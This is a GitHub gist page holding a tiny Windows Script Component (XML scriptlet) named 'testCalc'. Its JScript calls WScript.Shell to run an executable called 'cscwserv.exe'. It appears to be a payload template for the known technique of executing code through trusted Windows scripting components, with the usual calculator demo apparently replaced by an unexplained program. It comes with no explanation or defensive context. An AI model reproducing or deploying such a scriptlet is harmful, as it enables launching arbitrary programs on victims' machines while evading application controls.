Last active
August 2, 2018 17:06
-
-
Save negativelol/dc851669ef5ad277afbf46bfbc1bca44 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0"?> | |
<package> | |
<component id="testCalc"> | |
<script language="JScript"> | |
<![CDATA[ | |
var r = new ActiveXObject("WScript.Shell").Run("cscwserv.exe"); | |
]]> | |
</script> | |
</component> | |
</package> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment